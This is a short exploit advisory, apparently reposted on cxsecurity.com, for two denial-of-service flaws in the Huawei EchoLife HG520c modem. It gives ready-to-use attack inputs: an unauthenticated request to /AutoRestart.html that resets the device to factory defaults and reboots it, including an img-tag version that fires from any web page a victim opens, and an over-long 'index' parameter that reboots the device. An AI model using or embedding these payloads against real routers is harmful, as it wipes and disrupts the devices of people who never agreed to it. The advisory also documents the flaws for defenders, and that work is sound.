Huawei EchoLife HG520c Denial of Service and Modem Reset

2010.04.21
Credit: hkm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Huawei EchoLife HG520c Denial of Service and Modem Reset # Date: 2010-04-19 # Author: hkm # Product Link: http://www.huawei.com/mobileweb/en/products/view.do?id=660 # Firmware Versions: 3.10.18.7-1.0.7.0 # 3.10.18.5-1.0.7.0 # 3.10.18.4 # Software Versions: V100R001B120Telmex # V100R001B121Telmex [Description #1] ================= The page '/AutoRestart.html' restores the default configuration and reboots the device. This page does not require authentication. [Exploit #1] ================= >From LAN or Client Side, just send a simple GET request to: http://192.168.1.254/AutoRestart.html <img src=http://192.168.1.254/AutoRestart.html> In case of having the remote interface enabled, from remote: http://<REMOTE IP>/AutoRestart.html ______________________________________________________________________ [Description #2] ================= The page '/rpLocalDeviceJump.html' reboots the device when the 'index' variable value has a length of more than 7 characters. Requires authentication. [Exploit #2] ================= http://192.168.1.254/rpLocalDeviceJump.html?index=HAKIM.WS _____________________________________________________________________ Greets: Requiz, LightOS, chr1x, sdc, nitr0us, pcp, Xianur0, Chito, Kike, House, Aldo, Chewi, Alex, Paco. hkm hkm@hakim.ws [ Comunidad Underground de Mexico - http://www.underground.org.mx ]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top